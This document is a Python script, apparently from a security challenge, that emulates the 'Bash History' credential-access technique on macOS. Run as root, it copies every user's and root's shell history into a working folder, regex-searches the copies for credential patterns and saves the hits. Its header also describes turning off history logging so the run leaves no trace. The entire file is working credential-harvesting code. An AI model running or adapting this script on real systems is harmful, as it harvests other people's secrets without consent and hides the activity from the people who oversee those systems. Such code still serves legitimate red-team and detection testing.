# The SecDev Challenge
#
# Author: Fahad Khan
#
# PRE-CONDITIONS:
# Operating System = "MacOS"
#
# EXECUTION of ATTACK:
# Technique = "Bash History"
# Tactic = "Credential Access"
# Assumptions = "User has access to all users' .bash_history files. Should run as root"
#
# POST CONDITIONS/VALIDATION CHECK:
# Check the number of bash history files in the EXPLOIT_HOME/bash_history_files folder and the results file for any
# credential/tag information
#
# CLEANUP:
# There is no cleanup required as this exploit does not change any user or OS settings.
# We disable history logging before running this exploit so that no one can track it later from its own user history,
# and enable it after.
#
import argparse
import glob
import io
import json
import logging
import os
import re
import subprocess
from shutil import copy2
LOG = logging.getLogger(__name__)

# Runtime settings. All four start empty and are filled in by main() from the
# JSON config file:
#   EXPLOIT_HOME     working directory; copied histories, results and log live here
#   EXPLOIT_TAGS     '|'-separated search patterns used by examine_bash_history
#   LOG_FILENAME     log file name, relative to EXPLOIT_HOME
#   OUTPUT_FILENAME  results file name, relative to EXPLOIT_HOME
EXPLOIT_HOME = EXPLOIT_TAGS = LOG_FILENAME = OUTPUT_FILENAME = ''
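def get_argparser():
    """Build the command-line parser.

    Options:
        --log-level    logging level name (DEBUG, INFO, WARN or ERROR); default DEBUG.
        --config-file  path of the JSON config file; default ./config.json.

    Returns:
        A configured argparse.ArgumentParser.
    """
    # The description used to be argparse's 'Process some integers.' sample
    # text; it is what --help shows, so describe what the script does.
    parser = argparse.ArgumentParser(
        description="Collect users' bash history files and search them for "
                    "the tags listed in the config file."
    )
    parser.add_argument('--log-level',
                        default="DEBUG",
                        choices=["DEBUG", "INFO", "WARN", "ERROR"],
                        help='Set the log level')
    parser.add_argument('--config-file',
                        default="./config.json",
                        help='set the json config file name')
    return parser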
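def get_users(users_root='/Users'):
    """Return the usernames found under *users_root* (default /Users), minus Shared.

    Mirrors the original ``ls -1 /Users | grep -v Shared``: dot-entries are
    skipped, any entry whose name contains "Shared" is dropped and the result
    is sorted. Uses os.listdir rather than a shell pipeline, so directory
    names are never interpolated into a command line.

    Args:
        users_root: directory whose entries are treated as usernames.

    Returns:
        Sorted list of names, or [] when users_root cannot be listed (the
        shell version returned the ls error text as if it were a user).
    """
    logging.info('Getting users...')
    try:
        entries = os.listdir(users_root)
    except OSError as exc:
        logging.error('Could not list %s: %s', users_root, exc)
        return []
    # root is not listed here; its history is copied separately in
    # get_bash_history.
    return sorted(name for name in entries
                  if not name.startswith('.') and 'Shared' not in name)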
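def start_exploit():
    """Run the collection end to end.

    1) enumerate users, 2) copy their bash history files, 3) search the
    copies for the configured tags (only after a successful copy).

    Returns:
        0 on success, -1 when no users were found or no history file could
        be copied.
    """
    users = get_users()
    if not users:
        # Was `logging,info(...)`: a tuple expression that raised NameError
        # on this path instead of logging the message.
        logging.info('No users found in /Users directory')
        return -1
    logging.debug("List of users:%s", users)
    logging.info("%d user/users found", len(users))
    ret = get_bash_history(users)
    if ret == 0:
        ret = examine_bash_history()
    return ret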
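def get_bash_history(users, exploit_home=None):
    """Copy each user's ~/.bash_history, plus root's /var/root/.sh_history,
    into <exploit_home>/bash_history_files/<user>.bash_history.

    Home directories are resolved with os.path.expanduser (the original ran
    ``echo ~user/.bash_history`` through a shell); a name with no account
    is left unexpanded and the copy simply fails and is logged. The
    destination directory is created before any copy, so the root copy no
    longer fails just because no user had a history file, and the file count
    comes from os.listdir instead of parsing ``ls`` output (which reported a
    "No such file" error line as one copied file).

    Args:
        users: usernames to collect from.
        exploit_home: base directory; defaults to the module-level EXPLOIT_HOME.

    Returns:
        0 if the destination directory holds at least one file afterwards,
        -1 otherwise.
    """
    logging.info('Getting users bash history...')
    home = EXPLOIT_HOME if exploit_home is None else exploit_home
    dest_dir = home + '/bash_history_files'
    if not os.path.isdir(dest_dir):
        logging.info('Creating dir:' + dest_dir)
        os.makedirs(dest_dir)

    sources = [(user, os.path.expanduser('~' + user + '/.bash_history'))
               for user in users]
    sources.append(('root', '/var/root/.sh_history'))
    for name, src in sources:
        dst = os.path.join(dest_dir, name + '.bash_history')
        try:
            copy2(src, dst)
        except (IOError, OSError) as exc:
            # Covers both a missing file and a permission problem; the old
            # message blamed permissions for either.
            logging.error('Could not copy file %s: %s', src, exc)

    copied = os.listdir(dest_dir)
    if not copied:
        logging.info('No bash files copied')
        return -1
    logging.info("%d file/files copied", len(copied))
    return 0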
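def examine_bash_history(tags=None, exploit_home=None, output_filename=None):
    """Search the copied history files for each tag and write the hits to the
    results file.

    Each tag is compiled as a Python regular expression (the original handed
    it to ``grep`` as a pattern via the shell, with stderr merged into stdout,
    so a missing directory produced a grep error line in the results). Hits
    are written one per line as ``<path>:<line>``, grouped by tag in tag
    order, matching grep's multi-file output; lines are copied verbatim, so
    the results file holds whatever the tags matched.

    Args:
        tags: '|'-separated patterns; defaults to the module-level EXPLOIT_TAGS.
        exploit_home: base directory; defaults to EXPLOIT_HOME.
        output_filename: results file name; defaults to OUTPUT_FILENAME.

    Returns:
        0 always; no results file is written when nothing matched.
    """
    logging.info('Examining bash history files...')
    home = EXPLOIT_HOME if exploit_home is None else exploit_home
    out_name = OUTPUT_FILENAME if output_filename is None else output_filename
    tag_list = (EXPLOIT_TAGS if tags is None else tags).split('|')
    logging.info('Tags:' + str(tag_list))

    history_files = sorted(glob.glob(home + '/bash_history_files/*'))
    matches = []
    for tag in tag_list:
        try:
            pattern = re.compile(tag)
        except re.error as exc:
            logging.error('Skipping invalid tag %r: %s', tag, exc)
            continue
        for path in history_files:
            try:
                # errors='replace': history files are not guaranteed UTF-8.
                with io.open(path, 'r', encoding='utf-8', errors='replace') as fh:
                    for line in fh:
                        if pattern.search(line):
                            matches.append(path + ':' + line.rstrip('\n'))
            except (IOError, OSError) as exc:
                logging.error('Could not read %s: %s', path, exc)
    logging.debug("Commands:" + str(matches))

    if not matches:
        logging.info('No tags found in bash history')
        return 0
    try:
        # `with` closes the file; the original's `file.close` never called it.
        with io.open(home + "/" + out_name, 'w', encoding='utf-8') as out:
            out.write('\n'.join(matches) + '\n')
    except (IOError, OSError) as exc:
        logging.error('Exception occurred while writing to results file: %s', exc)
    return 0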
def verify_exploit(ret):
    """Log the outcome of start_exploit().

    ret == 0 logs where the results file is; any other value logs where the
    log file is. Both paths are built from the module-level settings.
    """
    if ret != 0:
        log_path = EXPLOIT_HOME + "/" + LOG_FILENAME
        logging.error("Exploit failed! Please check the logs at:" + log_path)
        return
    results_path = EXPLOIT_HOME + "/" + OUTPUT_FILENAME
    logging.info("Exploit is Successful! Please examine results at:" + results_path)
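def main():
    """Parse arguments, load the JSON config into the module globals, set up
    file logging under EXPLOIT_HOME and run the exploit.

    The config file must have a top-level "CONFIG" object with the keys
    EXPLOIT_HOME, EXPLOIT_TAGS, LOG_FILENAME and OUTPUT_FILENAME; a missing
    key is reported through the argument parser instead of a bare KeyError.
    Everything the script produces -- its log, the copied history files and
    the results file -- is written under EXPLOIT_HOME. The cleanup() call at
    the end is commented out, and nothing in this file implements the
    history-toggling described in the header comment.
    """
    global EXPLOIT_HOME, EXPLOIT_TAGS, LOG_FILENAME, OUTPUT_FILENAME
    parser = get_argparser()
    args = parser.parse_args()
    with open(args.config_file, 'r') as f:
        config = json.load(f)
    try:
        cfg = config['CONFIG']
        EXPLOIT_HOME = cfg['EXPLOIT_HOME']
        EXPLOIT_TAGS = cfg['EXPLOIT_TAGS']
        LOG_FILENAME = cfg['LOG_FILENAME']
        OUTPUT_FILENAME = cfg['OUTPUT_FILENAME']
    except KeyError as exc:
        parser.error('config file %s is missing key %s' % (args.config_file, exc))
    logging.basicConfig(level=args.log_level,
                        format="[%(asctime)s] [%(levelname)s] %(message)s",
                        filename=EXPLOIT_HOME + '/' + LOG_FILENAME)
    logging.info('------ CONFIGS -----------')
    logging.info('EXPLOIT_HOME = %s', EXPLOIT_HOME)
    logging.info('EXPLOIT_TAGS = %s', EXPLOIT_TAGS)
    logging.info('LOG_FILENAME = %s', LOG_FILENAME)
    logging.info('OUTPUT_FILENAME = %s', OUTPUT_FILENAME)
    logging.info('-------------------------')
    logging.info('Starting exploit....')
    ret = start_exploit()
    logging.info('Exploit complete!')
    verify_exploit(ret)
    #cleanup()


if __name__ == "__main__":
    main()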